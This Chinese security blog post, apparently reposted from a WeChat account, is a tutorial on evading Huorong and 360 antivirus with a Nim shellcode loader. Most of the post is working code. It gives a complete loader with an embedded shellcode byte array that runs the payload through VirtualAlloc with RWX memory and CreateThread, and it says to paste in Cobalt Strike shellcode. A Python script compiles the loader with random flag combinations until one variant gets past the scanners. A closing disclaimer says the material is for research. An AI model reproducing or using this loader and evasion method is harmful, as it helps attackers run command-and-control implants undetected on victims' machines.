小众编程语言NIM实现免杀过火绒及360

admin
admin
admin
141928
文章
117
评论
2025年5月7日17:14:52评论21 views字数 10220阅读34分4秒阅读模式

本次教程仅仅是探讨小众语言免杀的效果及NIM FUZZ编译的脚本分享,非一键化免杀方案,大佬勿喷

小众编程语言NIM实现免杀过火绒及360
如果觉得文字教程看不懂,可以看大师的B站视频教程:https://www.bilibili.com/video/BV1NHGmzoECA/
写这篇文章的时候样本已经提交给火绒
小众编程语言NIM实现免杀过火绒及360

一、简单介绍下NIM编程语言

为什么 Nim 适合写 Shellcode 加载器

  1. 低检测率(静态分析绕过)
    • Nim 的生成方式(先转 C,再编译)导致它生成的二进制不像常见的 C/C++ 或 Go 程序那样有明显特征
    • 很多杀软(AV/EDR)和静态分析器对 Nim 程序的指纹识别比较弱,检测率低
  2. 调用底层 API 简单直接
    • Nim 可以很轻松地调用 Windows API,比如 VirtualAllocCreateThreadWriteProcessMemory,这一点对于加载 shellcode 非常重要。
    • 支持直接内联汇编(asm)和手动管理内存。
  3. 小巧隐蔽
    • Nim 编译出来的二进制文件可以非常小(甚至几十 KB),非常适合做隐蔽的小型 loader。
    • 编译参数灵活,可以控制是否静态链接、优化去除调试信息,从而进一步降低被发现的概率。
  4. 灵活生成变异版
    • 通过 Nim 的宏和模板机制,可以很容易地自动生成变化版的 shellcode loader,比如不同的调用方式、加密方法,这对于对抗杀软特征检测非常有用。
  5. 开发效率高
    • Nim 语法现代,接近 Python,写 loader 代码比用纯 C 要轻松很多,同时又能保持接近 C 的底层能力。

二、安装NIM并配置开发环境

  1. 下载地址:https://nim-lang.org/install.html

    小众编程语言NIM实现免杀过火绒及360
    小众编程语言NIM实现免杀过火绒及360

  2. 下载完解压后,将bin目录配置环境变量

    小众编程语言NIM实现免杀过火绒及360

  3. cmd输入nim -v显示如下就是安装成功:

    小众编程语言NIM实现免杀过火绒及360

  4. 编译器选择 vscode 并安装代码提示插件:

    小众编程语言NIM实现免杀过火绒及360

三、编写shellcode加载器

给一个大师整的最简单的Nim加载器

import winim/leanproc main() =    var shellcode: seq[byte] = @[        byte 0xeb,0x01,0x23,0x4d,0x0f,0xa3,0xed,0xe8,0x50,0x04,0x00,0x00,0x4d,0x0f,0x41,0xf6,0xeb,0x01,0x0e,0x11,0x4a,0xc2,0x3d,0x20,0xf8,0x85,0x00,0x3a,0x59,0x46,0xac,0xb3,0xbf,0x13,0x6a,0x41,0x30,0x14,0x08,0x41,0x02,0x14,0x08,0xe2,0xf6,0xbb,0x93,0x5e,0x5d,0x5d,0x99,0x70,0x6d,0x78,0x29,0xa0,0xe3,0xdb,0x55,0x9d,0x2d,0x98,0xd9,0x59,0x5d,0x4e,0x4d,0x4c,0xfb,0x75,0xda,0xd0,0x09,0xe9,0xe1,0x45,0x05,0x25,0xa2,0xe6,0x94,0x96,0x55,0x37,0x3d,0xa2,0x2e,0xad,0xd2,0x8b,0xdd,0x6e,0xf7,0xf7,0xf2,0x0d,0xe6,0x28,0xeb,0x61,0xc9,0xb5,0x0a,0xc4,0x47,0x01,0x7c,0x7f,0x8f,0xe9,0xae,0x97,0xce,0x0f,0x44,0xf0,0x29,0xd6,0x1b,0x1c,0xdd,0x84,0x67,0x4c,0x21,0x38,0xb1,0x24,0x8f,0xcd,0x62,0x20,0x7d,0xcf,0x6a,0xbf,0xb2,0x5b,0x7a,0xef,0x9a,0x97,0x96,0x06,0x34,0x6b,0x2d,0x20,0x4f,0xe0,0xc9,0x8f,0x54,0x4b,0x9c,0x50,0x87,0xe7,0x9c,0x13,0x3a,0x55,0x28,0x44,0xcd,0x05,0x24,0xdf,0x08,0x0f,0x20,0x30,0x5c,0x3a,0xfe,0xbb,0xca,0x3e,0x65,0x48,0x87,0xfe,0xff,0x9b,0x88,0x1a,0x2f,0x9f,0x07,0xf6,0xe1,0x4b,0x61,0xc6,0x31,0x50,0x6a,0x3f,0x9c,0x5c,0x45,0x4a,0x41,0xe6,0xba,0x91,0x2d,0xb2,0x47,0xe8,0x8d,0xf7,0xb4,0xb2,0x8a,0x64,0x17,0x99,0xa9,0x0b,0x1b,0x85,0x9d,0xa7,0x5b,0x26,0xea,0x69,0x9a,0x33,0x6d,0x72,0x34,0x98,0x42,0xd2,0xa2,0x93,0x2f,0x36,0x19,0x3d,0xb6,0x89,0x28,0xfd,0xd5,0xa9,0xc8,0x53,0x5e,0xc5,0xe4,0x5e,0x57,0xbc,0x64,0xe2,0xcc,0xfd,0x07,0xc6,0x0f,0x65,0xb5,0xca,0x11,0xb9,0xc7,0xcb,0xfd,0x64,0xa7,0x22,0x62,0xe5,0x85,0x92,0xf5,0x09,0x63,0xf8,0xb6,0xdf,0x0b,0x55,0x2d,0x6b,0x4e,0xed,0xd4,0x5f,0xed,0xd5,0xaf,0x63,0x3d,0x38,0x9a,0x09,0xae,0x00,0x95,0x4a,0x18,0xad,0x63,0x12,0xf5,0xa0,0x02,0xa1,0x2e,0x91,0x1c,0x7a,0xd7,0x7c,0x2b,0xdf,0xa9,0x9e,0x3e,0x07,0xf0,0x55,0xfa,0x02,0x85,0xbe,0xc1,0x96,0x70,0x4a,0x5a,0xbe,0x23,0x57,0x23,0x44,0x59,0xff,0x99,0x78,0x94,0x9f,0x3e,0xc5,0x4d,0x3b,0xe1,0x60,0x1c,0xc0,0x14,0x1a,0x55,0x93,0x49,0x6c,0xa8,0x33,0xfa,0xdc,0x14,0x2c,0x66,0xf3,0x71,0xa3,0x3a,0xb5,0x44,0xee,0x7a,0x7a,0xbd,0x75,0x13,0xbc,0x5a,0x32,0x63,0xee,0x16,0x21,0x5c,0x05,0xd5,0x7c,0x06,0xe7,0x74,0xbe,0x44,0xb5,0x3c,0xbe,0x67,0x1f,0x7b,0x4a,0x93,0x56,0xbb,0xd2,0xa7,0x02,0xa6,0xa0,0x1b,0xb4,0x96,0x72,0xdf,0x3b,0x5d,0x24,0x95,0xa9,0x4a,0xb3,0x1f,0x11,0xbb,0x4e,0x57,0x0b,0x5b,0xa6,0x3a,0x3c,0x67,0x23,0x19,0xd7,0x94,0xe7,0x14,0xe2,0x7a,0xab,0x5d,0xaa,0xec,0x3f,0x01,0x24,0x70,0x9d,0xb4,0x79,0x69,0xa9,0xef,0x74,0x0f,0x31,0x06,0xf9,0xcc,0xc9,0x99,0xcb,0xa7,0x6b,0xcd,0x88,0x82,0xa8,0x21,0x11,0xd9,0x67,0x76,0xff,0x32,0x3c,0xf8,0xe7,0xf4,0x06,0x8e,0x03,0x55,0xde,0xc5,0xc8,0xae,0x7f,0x0b,0x59,0x02,0xe7,0xc5,0x0c,0x3f,0xb9,0xbf,0x0e,0x0c,0x23,0x6b,0xeb,0x08,0x63,0x98,0x39,0xe7,0xf0,0xc2,0x3c,0xd3,0xd8,0x3d,0x13,0x84,0x2e,0x23,0x4d,0x07,0x36,0xf1,0x2f,0x1e,0x2b,0x05,0x21,0x3d,0xe8,0x2b,0x51,0xdc,0x71,0x8e,0x3d,0x78,0xb8,0x0b,0xd6,0x3c,0xa5,0x5a,0x36,0xe1,0x13,0x26,0x4f,0x1e,0x10,0xc8,0x58,0xb4,0x1c,0xc2,0x46,0x82,0x55,0xb7,0x48,0x20,0xbd,0x1f,0x3d,0x5a,0xef,0x37,0xc1,0xde,0x44,0x0f,0xeb,0x47,0x38,0xa5,0xcd,0xc2,0xfa,0xae,0x8b,0x26,0xae,0xf5,0xce,0xb5,0xe9,0x90,0xe8,0xd5,0xab,0x0f,0xc6,0x37,0x39,0xcf,0xa9,0xf6,0x31,0xc4,0x78,0x03,0x2a,0xfb,0xf5,0x1f,0x0e,0x5d,0x14,0xfb,0x0c,0xa7,0xe8,0xaa,0x9f,0x57,0xd1,0x5d,0x8b,0x48,0xce,0x0b,0x20,0xad,0x6e,0x85,0xcd,0x55,0xba,0x52,0x22,0x6b,0x23,0x59,0xb9,0xf7,0xcf,0xf6,0x42,0x4c,0x7e,0x2f,0x55,0x80,0x1f,0x42,0x05,0xd4,0xc6,0x1e,0x07,0xd9,0x05,0x6a,0x58,0x74,0x04,0x5f,0xf9,0x39,0x9a,0x3f,0xbc,0xb9,0xf7,0x70,0xfc,0x14,0xa0,0x91,0x88,0xfc,0xd3,0x19,0xca,0xf1,0xb8,0x16,0x1e,0xf9,0xc4,0xdf,0x22,0x38,0x7f,0x40,0xe3,0x09,0x07,0x2c,0xb7,0x85,0x82,0xc8,0x0e,0xf4,0xd5,0x0a,0x5c,0x6d,0x16,0x2b,0xa9,0x5d,0x84,0x48,0xa5,0xd8,0xa8,0x85,0xb5,0x65,0x0f,0x34,0x84,0xb6,0xec,0x54,0x82,0x52,0x3c,0x40,0x72,0x26,0x05,0x66,0x32,0x9a,0x18,0x4b,0x23,0x72,0x2d,0x27,0x15,0x75,0x18,0x9a,0xae,0xcd,0x4c,0xd8,0x4c,0x78,0x03,0x84,0x54,0xd2,0x26,0xae,0xed,0x3c,0xe3,0xa7,0x1b,0x07,0x20,0x86,0xba,0x12,0x8c,0x35,0xf7,0x5f,0x91,0xed,0xc7,0x23,0x5e,0x40,0xcf,0x2c,0x95,0x79,0xd5,0x27,0xce,0x85,0x61,0xc8,0x1f,0xd5,0xcd,0x08,0x02,0x15,0x19,0x7e,0xd5,0x85,0x48,0x35,0x54,0xfb,0xe9,0xb9,0x7c,0x96,0x21,0x03,0xc4,0xfb,0xc9,0x56,0xd0,0x2e,0x7d,0xc8,0x23,0x8c,0x77,0xcc,0x6d,0x1c,0x7a,0xa0,0xb6,0x88,0x72,0xe7,0x6f,0xff,0x55,0xad,0x90,0x97,0xd0,0x55,0x7d,0x46,0x7c,0xf7,0x7d,0x97,0xb6,0x0a,0x41,0x9c,0x93,0x1e,0xc0,0x94,0xbd,0x5f,0x0d,0xae,0xc9,0x53,0x17,0x32,0x68,0x4b,0x58,0xb4,0xa7,0x43,0x22,0x36,0x57,0xc6,0x33,0x24,0xb1,0x3e,0x4a,0x7f,0xce,0xb2,0x08,0x0d,0xb1,0x26,0xf2,0xb7,0xe6,0x5f,0xeb,0x0f,0x42,0x8b,0xa5,0x65,0x5a,0x7a,0xf5,0x58,0x09,0xcf,0xfd,0x5d,0xef,0x5e,0x26,0xcc,0xe0,0x24,0xef,0xa9,0x30,0xf4,0x51,0x97,0x60,0xe2,0x85,0xcd,0x01,0x01,0xfa,0x50,0xc9,0x62,0x65,0x78,0xe8,0xfc,0x5e,0xcd,0x1e,0x7f,0xd8,0xf1,0x16,0xe1,0x47,0x9e,0xcc,0x6b,0x11,0x9e,0x97,0x0d,0xc2,0x44,0xf9,0x4d,0x95,0x5f,0xc3,0x7d,0x2a,0xa3,0xc1,0xf1,0x4b,0xa0,0x23,0x27,0xb4,0x9b,0xfb,0xdc,0x17,0xe1,0x56,0xd5,0x8c,0x32,0x91,0x0f,0x8a,0x00,0x43,0x18,0x32,0x52,0x8f,0x29,0x68,0xc8,0x60,0xd8,0xdd,0x00,0xa7,0x09,0xfc,0x06,0x2e,0x70,0xe4,0x24,0xb4,0x55,0x1a,0x99,0xed,0x95,0xa2,0xee,0xc2,0x7b,0x73,0x00,0xa4,0xc5,0x60,0x22,0x30,0xea,0xa0,0x5c,0x3f,0xc9,0xbd,0x3e,0xc7,0x39,0x09,0x24,0xf6,0x97,0xa4,0xf7,0xe8,0xd7,0x51,0x53,0x07,0x46,0x98,0xd7,0x2b,0x59,0xe1,0x94,0x90,0x85,0x9d,0x59,0xd0,0x14,0x5f,0xa8,0x4a,0xb9,0x41,0x56,0x5a,0xf1,0x40,0x6c,0xff,0xb9,0x63,0x6b,0xda,0xf2,0xa1,0xf4,0x3f,0xab,0xbd,0x1c,0xc2,0x0b,0x92,0x0a,0xb3,0x23,0xd9,0x7e,0x6e,0xa4,0xd5,0xd4,0x4b,0x4f,0x38,0x66,0x61,0x9c,0xce,0x7c,0x6b,0x8c,0x90,0x48,0x7c,0xb9,0xe3,0x92,0xe4,0x8f,0xc9,0xbf,0x8d,0x92,0x79,0x46,0x19,0x4d,0xb8,0x01,0xf0,0xe7,0xa7,0x26,0x47,0xd6,0x28,0x52,0x59,0x8b,0x87,0x5b,0xed,0x0a,0x53,0x12,0x5c,0xaf,0xfd,0xaa,0x33,0x2b,0x14,0x4c,0x8b,0x24,0x24,0x48,0x83,0xec,0x08,0xeb,0x01,0x64,0x49,0xff,0xcf,0xd9,0xe5,0x49,0xff,0xc7,0x41,0x81,0x44,0x24,0x07,0xa1,0xaa,0x86,0x89,0x90,0x41,0xc1,0x4c,0x24,0x0b,0x65,0xeb,0x01,0x58,0x48,0x0f,0x4b,0xdb,0x41,0x81,0x6c,0x24,0x0f,0x3a,0x0d,0xb9,0xa6,0x41,0x81,0x6c,0x24,0x13,0xaa,0xbf,0x13,0x6a,0x41,0x54,0xc3]    let shellcodeSize = shellcode.len    echo "[*] 分配内存..."    let mem = VirtualAlloc(        nil,        cast[SIZE_T](shellcodeSize),        MEM_COMMIT or MEM_RESERVE,        PAGE_EXECUTE_READWRITE    )    if mem == nil:        echo "[-] VirtualAlloc 失败: ", GetLastError()        return    echo "[+] 内存分配成功: ", cast[int](mem).toHex()    echo "[*] 复制 shellcode 到分配的内存..."    copyMem(mem, unsafeAddr shellcode[0], cast[SIZE_T](shellcodeSize))    echo "[*] 创建线程执行 shellcode..."    let thread = CreateThread(        nil,        0,        cast[LPTHREAD_START_ROUTINE](mem),        nil,        0,        nil    )    if thread == INVALID_HANDLE_VALUE:        echo "[-] CreateThread 失败: ", GetLastError()        return    echo "[+] 线程创建成功, 等待执行完成..."    discard WaitForSingleObject(thread, INFINITE)    echo "[*] 清理..."    discard VirtualFree(mem, 0, MEM_RELEASE)    discard CloseHandle(thread)    echo "[+] 完成"when isMainModule:    main()

将cs的shellcode复制到加载器中,在使用大师写的nim Fuzz编译小工具,对nim进行一个Fuzz编译,最后只要有一个能过杀毒软件,那么我就就成功了(这个python脚本用于采用多种编译手法对源码进行编译)

import osimport randomimport stringimport subprocessfrom pathlib import Path# ========== 配置 ========== OUTPUT_DIR = "output"      # 输出目录# ==========================# 常用编译参数池(覆盖常见方法)COMPILER_FLAGS_POOL = [    ["-d:release"],  # 发布版    ["-d:danger"],  # 取消所有运行时检查    ["--opt:size"],  # 优化体积    ["--opt:speed"],  # 优化速度    ["--gc:arc"],  # 使用ARC内存管理    ["--gc:orc"],  # 使用ORC内存管理    ["--threads:on"],  # 开启线程支持    ["--tlsEmulation:off"],  # 关闭TLS模拟    ["--passC:"-fomit-frame-pointer""],  # 优化堆栈帧    ["--passL:"-Wl,--gc-sections""],  # 删除未使用的代码段    ["--passC:"-ffunction-sections -fdata-sections""],  # 更多细粒度优化    ["-d:strip"],  # 去除符号表]# 固定组合(常见)FIXED_COMBINATIONS = [    ["-d:release""--opt:size""--gc:arc"],    ["-d:release""--opt:speed""--gc:orc"],    ["-d:danger""--threads:on""--gc:arc"],    ["-d:release""--passC:"-fomit-frame-pointer"""--passL:"-Wl,--gc-sections""],]def random_filename(length=8):    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))def compile_with_flags(source_file, output_dir, flags):    filename = random_filename() + ".exe"    flags_str = " ".join(flags)    output_path = Path(output_dir) / filename    cmd = f"nim c {flags_str} -o:{output_path}{source_file}"    print(f"[+] 编译 {output_path} with flags: {flags_str}")    try:        subprocess.run(cmd, shell=True, check=True)        return filename, flags_str  # 返回文件名和编译参数    except subprocess.CalledProcessError:        print("[!] 编译失败,跳过。")        return NoneNonedef main():    # 获取用户输入的nim源文件    nim_source = input("请输入要编译的Nim源文件路径: ")    # 确保输入文件存在    if not os.path.isfile(nim_source):        print(f"[!] 错误: 文件 {nim_source} 不存在!")        return    os.makedirs(OUTPUT_DIR, exist_ok=True)    # 存储所有编译的exe和对应的编译参数    compile_results = []    # 先编译固定组合    for flags in FIXED_COMBINATIONS:        filename, flags_str = compile_with_flags(nim_source, OUTPUT_DIR, flags)        if filename:            compile_results.append((filename, flags_str))    # 再随机组合,生成10组    for _ in range(10):        random_flags = []        # 随机选3-5个flags组合        for _ in range(random.randint(35)):            random_flags += random.choice(COMPILER_FLAGS_POOL)        filename, flags_str = compile_with_flags(nim_source, OUTPUT_DIR, random_flags)        if filename:            compile_results.append((filename, flags_str))    # 输出编译结果    print("n[+] 编译完成,结果如下:")    for filename, flags_str in compile_results:        print(f"{filename} 编译参数: {flags_str}")if __name__ == "__main__":    main()

使用该程序将做好的加载器使用不同参数编译出14个exe,导入360和火绒进行扫描

小众编程语言NIM实现免杀过火绒及360

最后活了一个够用了哈哈,毕竟加载器基本没咋改过

小众编程语言NIM实现免杀过火绒及360
如果觉得文字教程看不懂,可以看大师的B站视频教程:https://www.bilibili.com/video/BV1NHGmzoECA/
本文章仅仅对小众编程语言的免杀做一个简单研究,代码也是最简单的并没有做各种反沙箱呀、针对不同杀毒软件编写不同的加载代码呀什么的,大佬勿喷!
对地图大师最新安全研究成果感兴趣的师傅可以访问地图大师个人网站:https://www.ditusec.com
小众编程语言NIM实现免杀过火绒及360

原文始发于微信公众号(地图大师的漏洞追踪指南):小众编程语言NIM实现免杀过火绒及360

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月7日17:14:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   小众编程语言NIM实现免杀过火绒及360https://cn-sec.com/archives/4034055.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息